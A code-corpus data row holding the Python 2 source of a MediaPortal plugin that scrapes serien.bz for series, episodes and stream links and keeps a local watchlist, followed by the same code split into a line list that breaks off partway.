org_text
stringlengths
830
329k
texts
sequence
scores
sequence
num_lines
int64
1
8.05k
avg_score
float64
0
0.27
check
bool
1 class
# -*- coding: utf-8 -*- from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * class SerienFirstScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "ok" : self.keyOK, "0" : self.closeAll, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Genre:") self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.genreliste.append(("Serien A-Z","dump")) self.genreliste.append(("Watchlist","dump")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) self.keyLocked = False self.showInfos() def keyOK(self): Auswahl = self['liste'].getCurrent()[0][0] if Auswahl == "Serien A-Z": self.session.open(SerienLetterScreen) else: self.session.open(sbzWatchlistScreen) class SerienLetterScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : 
self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Genre Asuwahl") self['name'] = Label(_("Please wait...")) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] url = "http://serien.bz" getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): raw = re.findall('<a class="LetterMode " href="(.*?)">(.*?)<', data, re.S) if raw: self.filmliste = [] for (serienUrl, serienTitle) in raw: self.filmliste.append((decodeHtml(serienTitle), serienUrl)) self.ml.setList(map(self._defaultlistcenter, self.filmliste)) self.keyLocked = False self.showInfos() def showInfos(self): title = self['liste'].getCurrent()[0][0] self['name'].setText(title) def keyOK(self): if self.keyLocked: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] self.session.open(SerienSecondScreen, serienLink, serienName) class SerienSecondScreen(MPScreen, ThumbsHelper): def __init__(self, session, serienLink, serienName): self.serienLink = serienLink self.serienName = serienName self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) ThumbsHelper.__init__(self) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "5" : self.keyShowThumb, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft, "green" : 
self.addWatchlist }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Letter: %s" % self.serienName) self['name'] = Label(_("Please wait...")) self['F2'] = Label(_("Add to Watchlist")) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.page = 0 self.ImageUrl = "" self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] if self.serienName == "Top50": url = "http://serien.bz" else: url = self.serienLink getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): raw = re.findall('<li><a href="(.*?)".*?>(.*?)</a>', data, re.S) if raw: for (serienUrl, serienTitle) in raw: self.filmliste.append((decodeHtml(serienTitle), serienUrl)) self.ml.setList(map(self._defaultlistleft, self.filmliste)) self.keyLocked = False self.th_ThumbsQuery(self.filmliste, 0, 1, 1, None, '<p\sstyle="text-align:\scenter;"><a\shref="(.*?)"><img class', 1, 1) self.showInfos() def showInfos(self): serienUrl = self['liste'].getCurrent()[0][1] getPage(serienUrl, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.showInfos2).addErrback(self.dataError) def showInfos2(self, data): sbzCover = re.findall('<div class="entry">.*?<p.*?src="(.*?)".*?</p>.*?<p.*?</p>.*?<p.*?</p>', data, re.S) if sbzCover: self.ImageUrl = "http://serien.bz%s" % sbzCover[0] CoverHelper(self['coverArt']).getCover(self.ImageUrl) else: self.ImageUrl = "" serienTitle = self['liste'].getCurrent()[0][0] if re.match('.*?Sorry, but there.*?category yet.</h2>', data, re.S): self['handlung'].setText("Kein Stream vorhanden!") self['name'].setText("Kein Stream vorhanden!") else: self['name'].setText(decodeHtml(serienTitle)) sbzdescription = re.findall('<div class="entry">.*?<p.*?</p>.*?<p.*?</p>.*?<p style="text-align: left;">(.*?)</p>', data, re.S) self.handlung = sbzdescription if 
sbzdescription: self['handlung'].setText(decodeHtml(sbzdescription[0])) else: self['handlung'].setText(_("No information found.")) def addWatchlist(self): if self.keyLocked: return self.serienName = self['liste'].getCurrent()[0][0] self.serienLink = self['liste'].getCurrent()[0][1] print self.serienName, self.serienLink, self.ImageUrl, self.handlung if not fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "erstelle watchlist" open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","w").close() if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "schreibe watchlist", self.serienName, self.serienLink, self.ImageUrl, self.handlung writePlaylist = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","a") writePlaylist.write('"%s" "%s" "%s" "%s"\n' % (self.serienName, self.serienLink, self.ImageUrl, self.handlung)) writePlaylist.close() message = self.session.open(MessageBoxExt, _("%s was added to the watchlist." % self.serienName), MessageBoxExt.TYPE_INFO, timeout=3) def keyOK(self): if self.keyLocked: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] print serienName, serienLink self.session.open(SerienEpListingScreen, serienLink, serienName, self.ImageUrl) class SerienEpListingScreen(MPScreen): def __init__(self, session, serienLink, serienName, serienPic): self.serienLink = serienLink self.serienName = serienName self.serienPic = serienPic self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self['title'] = 
Label("Serien.bz") self['ContentTitle'] = Label(_("Episode Selection")) self['name'] = Label(self.serienName) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] url = self.serienLink CoverHelper(self['coverArt']).getCover(self.serienPic) getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): streams_raw = re.findall('>Staffel:.(.*?)</th>(.*?)</table>', data, re.S) if streams_raw: for staffel,ep_raw in streams_raw: ep_raw2 = re.findall('<strong>Episode.(.*?)</strong>(.*?</p>)', ep_raw,) if ep_raw2: for episode,ep_rawData in ep_raw2: streams = re.findall('<strong>Stream:</strong> <a href="(.*?)".*?\| (.*?)<', ep_rawData, re.S) if streams: if int(staffel) < 10: s = "S0%s" % str(staffel) else: s = "S%s" % str(staffel) if int(episode) < 10: e = "E0%s" % str(episode) else: e = "E%s" % str(episode) title = "%s%s" % (s, e) self.filmliste.append((title, streams)) self.ml.setList(map(self._defaultlistleft, self.filmliste)) self.keyLocked = False def keyOK(self): serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] print serienName, serienLink self.session.open(SerienStreamListingScreen, serienLink, serienName, self.serienPic) class SerienStreamListingScreen(MPScreen): def __init__(self, session, serienLink, serienName, serienPic): self.serienLink = serienLink self.serienName = serienName self.serienPic = serienPic self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, 
session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label(_("Stream Selection")) self['name'] = Label(self.serienName) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] CoverHelper(self['coverArt']).getCover(self.serienPic) for hoster,hostrname in self.serienLink: if isSupportedHoster(hostrname, True): self.filmliste.append((hostrname, hoster)) if len(self.filmliste) == 0: self.filmliste.append((_('No supported streams found!'), None)) self.ml.setList(map(self._defaultlisthoster, self.filmliste)) self.keyLocked = False def keyOK(self): hostername = self['liste'].getCurrent()[0][0] hoster = self['liste'].getCurrent()[0][1] get_stream_link(self.session).check_link(hoster, self.playfile) def playfile(self, stream_url): if stream_url != None: self.session.open(SimplePlayer, [(self.serienName, stream_url, self.serienPic)], showPlaylist=False, ltype='serien.bz', cover=True) class sbzWatchlistScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft, "red" : self.delWatchListEntry }, -1) self.keyLocked = True self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Watchlist") self['F1'] = Label(_("Delete")) 
self.watchListe = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.watchListe = [] if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "read watchlist" readStations = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readStations.readlines(): data = re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: (title, link, image, handlung) = data[0] print title, link, image self.watchListe.append((title, link, image, handlung)) print "Load Watchlist.." self.watchListe.sort() self.ml.setList(map(self._defaultlistleft, self.watchListe)) readStations.close() self.showInfos() self.keyLocked = False def showInfos(self): if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "read watchlist" readStations = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readStations.readlines(): data = re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: self.ImageUrl = self['liste'].getCurrent()[0][2] self.Handlung = self['liste'].getCurrent()[0][3] self['handlung'].setText(decodeHtml(self.Handlung)) CoverHelper(self['coverArt']).getCover(self.ImageUrl) else: self['handlung'].setText(_("No information found.")) picPath = "%s/skins/%s/images/no_coverArt.png" % (self.plugin_path, config.mediaportal.skin.value) CoverHelper(self['coverArt']).getCover(picPath) def delWatchListEntry(self): exist = self['liste'].getCurrent() if self.keyLocked or exist == None: return entryDeleted = False selectedName = self['liste'].getCurrent()[0][0] writeTmp = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist.tmp","w") if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): readWatchlist = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readWatchlist.readlines(): data = 
re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: (title, link, image, handlung) = data[0] if title != selectedName: writeTmp.write('"%s" "%s" "%s" "%s"\n' % (title, link, image, handlung)) else: if entryDeleted: writeTmp.write('"%s" "%s" "%s" "%s"\n' % (title, link, image, handlung)) else: entryDeleted = True readWatchlist.close() writeTmp.close() shutil.move(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist.tmp", config.mediaportal.watchlistpath.value+"mp_sbz_watchlist") self.loadPage() def keyOK(self): exist = self['liste'].getCurrent() if self.keyLocked or exist == None: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] serienPic = self['liste'].getCurrent()[0][2] self.session.open(SerienEpListingScreen, serienLink, serienName, serienPic)
[ "# -*- coding: utf-8 -*-\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "\n", "class SerienFirstScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Genre:\")\n", "\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.genreliste.append((\"Serien A-Z\",\"dump\"))\n", "\t\tself.genreliste.append((\"Watchlist\",\"dump\"))\n", "\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\tself.keyLocked = False\n", "\t\tself.showInfos()\n", "\n", "\tdef keyOK(self):\n", "\t\tAuswahl = self['liste'].getCurrent()[0][0]\n", "\t\tif Auswahl == \"Serien A-Z\":\n", "\t\t\tself.session.open(SerienLetterScreen)\n", "\t\telse:\n", "\t\t\tself.session.open(sbzWatchlistScreen)\n", "\n", "class SerienLetterScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", 
"\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\"\t: self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Genre Asuwahl\")\n", "\t\tself['name'] = Label(_(\"Please wait...\"))\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\turl = \"http://serien.bz\"\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\traw = re.findall('<a class=\"LetterMode \" href=\"(.*?)\">(.*?)<', data, re.S)\n", "\t\tif raw:\n", "\t\t\tself.filmliste = []\n", "\t\t\tfor (serienUrl, serienTitle) in raw:\n", "\t\t\t\tself.filmliste.append((decodeHtml(serienTitle), serienUrl))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.filmliste))\n", "\t\t\tself.keyLocked = False\n", "\t\t\tself.showInfos()\n", "\n", "\tdef showInfos(self):\n", "\t\ttitle = self['liste'].getCurrent()[0][0]\n", "\t\tself['name'].setText(title)\n", "\n", "\tdef keyOK(self):\n", 
"\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tself.session.open(SerienSecondScreen, serienLink, serienName)\n", "\n", "class SerienSecondScreen(MPScreen, ThumbsHelper):\n", "\n", "\tdef __init__(self, session, serienLink, serienName):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\t\tThumbsHelper.__init__(self)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"5\" : self.keyShowThumb,\n", "\t\t\t\"ok\"\t: self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft,\n", "\t\t\t\"green\" : self.addWatchlist\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Letter: %s\" % self.serienName)\n", "\t\tself['name'] = Label(_(\"Please wait...\"))\n", "\t\tself['F2'] = Label(_(\"Add to Watchlist\"))\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.page = 0\n", "\t\tself.ImageUrl = \"\"\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\tif self.serienName == \"Top50\":\n", "\t\t\turl = \"http://serien.bz\"\n", 
"\t\telse:\n", "\t\t\turl = self.serienLink\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\traw = re.findall('<li><a href=\"(.*?)\".*?>(.*?)</a>', data, re.S)\n", "\t\tif raw:\n", "\t\t\tfor (serienUrl, serienTitle) in raw:\n", "\t\t\t\tself.filmliste.append((decodeHtml(serienTitle), serienUrl))\n", "\t\t\tself.ml.setList(map(self._defaultlistleft, self.filmliste))\n", "\t\t\tself.keyLocked = False\n", "\t\t\tself.th_ThumbsQuery(self.filmliste, 0, 1, 1, None, '<p\\sstyle=\"text-align:\\scenter;\"><a\\shref=\"(.*?)\"><img class', 1, 1)\n", "\t\t\tself.showInfos()\n", "\n", "\tdef showInfos(self):\n", "\t\tserienUrl = self['liste'].getCurrent()[0][1]\n", "\t\tgetPage(serienUrl, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.showInfos2).addErrback(self.dataError)\n", "\n", "\tdef showInfos2(self, data):\n", "\t\tsbzCover = re.findall('<div class=\"entry\">.*?<p.*?src=\"(.*?)\".*?</p>.*?<p.*?</p>.*?<p.*?</p>', data, re.S)\n", "\t\tif sbzCover:\n", "\t\t\tself.ImageUrl = \"http://serien.bz%s\" % sbzCover[0]\n", "\t\t\tCoverHelper(self['coverArt']).getCover(self.ImageUrl)\n", "\t\telse:\n", "\t\t\tself.ImageUrl = \"\"\n", "\t\tserienTitle = self['liste'].getCurrent()[0][0]\n", "\t\tif re.match('.*?Sorry, but there.*?category yet.</h2>', data, re.S):\n", "\t\t\tself['handlung'].setText(\"Kein Stream vorhanden!\")\n", "\t\t\tself['name'].setText(\"Kein Stream vorhanden!\")\n", "\t\telse:\n", "\t\t\tself['name'].setText(decodeHtml(serienTitle))\n", "\t\t\tsbzdescription = re.findall('<div class=\"entry\">.*?<p.*?</p>.*?<p.*?</p>.*?<p style=\"text-align: left;\">(.*?)</p>', data, re.S)\n", "\t\t\tself.handlung = sbzdescription\n", "\t\t\tif sbzdescription:\n", "\t\t\t\tself['handlung'].setText(decodeHtml(sbzdescription[0]))\n", "\t\t\telse:\n", "\t\t\t\tself['handlung'].setText(_(\"No information 
found.\"))\n", "\n", "\tdef addWatchlist(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\n", "\t\tself.serienName = self['liste'].getCurrent()[0][0]\n", "\t\tself.serienLink = self['liste'].getCurrent()[0][1]\n", "\n", "\t\tprint self.serienName, self.serienLink, self.ImageUrl, self.handlung\n", "\n", "\t\tif not fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"erstelle watchlist\"\n", "\t\t\topen(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"w\").close()\n", "\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"schreibe watchlist\", self.serienName, self.serienLink, self.ImageUrl, self.handlung\n", "\t\t\twritePlaylist = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"a\")\n", "\t\t\twritePlaylist.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (self.serienName, self.serienLink, self.ImageUrl, self.handlung))\n", "\t\t\twritePlaylist.close()\n", "\t\t\tmessage = self.session.open(MessageBoxExt, _(\"%s was added to the watchlist.\" % self.serienName), MessageBoxExt.TYPE_INFO, timeout=3)\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tprint serienName, serienLink\n", "\t\tself.session.open(SerienEpListingScreen, serienLink, serienName, self.ImageUrl)\n", "\n", "class SerienEpListingScreen(MPScreen):\n", "\n", "\tdef __init__(self, session, serienLink, serienName, serienPic):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.serienPic = serienPic\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback 
+ \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(_(\"Episode Selection\"))\n", "\t\tself['name'] = Label(self.serienName)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\turl = self.serienLink\n", "\t\tCoverHelper(self['coverArt']).getCover(self.serienPic)\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\tstreams_raw = re.findall('>Staffel:.(.*?)</th>(.*?)</table>', data, re.S)\n", "\t\tif streams_raw:\n", "\t\t\tfor staffel,ep_raw in streams_raw:\n", "\t\t\t\tep_raw2 = re.findall('<strong>Episode.(.*?)</strong>(.*?</p>)', ep_raw,)\n", "\t\t\t\tif ep_raw2:\n", "\t\t\t\t\tfor episode,ep_rawData in ep_raw2:\n", "\t\t\t\t\t\tstreams = re.findall('<strong>Stream:</strong> <a href=\"(.*?)\".*?\\| (.*?)<', ep_rawData, re.S)\n", "\t\t\t\t\t\tif streams:\n", "\t\t\t\t\t\t\tif int(staffel) < 10:\n", "\t\t\t\t\t\t\t\ts = \"S0%s\" % str(staffel)\n", "\t\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\t\ts = \"S%s\" % str(staffel)\n", "\n", "\t\t\t\t\t\t\tif int(episode) < 10:\n", "\t\t\t\t\t\t\t\te = \"E0%s\" % str(episode)\n", "\t\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\t\te = \"E%s\" % str(episode)\n", "\n", "\t\t\t\t\t\t\ttitle = \"%s%s\" % (s, e)\n", "\n", "\t\t\t\t\t\t\tself.filmliste.append((title, streams))\n", 
"\t\t\t\t\tself.ml.setList(map(self._defaultlistleft, self.filmliste))\n", "\t\t\t\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tprint serienName, serienLink\n", "\t\tself.session.open(SerienStreamListingScreen, serienLink, serienName, self.serienPic)\n", "\n", "class SerienStreamListingScreen(MPScreen):\n", "\n", "\tdef __init__(self, session, serienLink, serienName, serienPic):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.serienPic = serienPic\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(_(\"Stream Selection\"))\n", "\t\tself['name'] = Label(self.serienName)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\tCoverHelper(self['coverArt']).getCover(self.serienPic)\n", "\t\tfor hoster,hostrname in self.serienLink:\n", "\t\t\tif isSupportedHoster(hostrname, True):\n", "\t\t\t\tself.filmliste.append((hostrname, hoster))\n", "\t\tif len(self.filmliste) == 0:\n", 
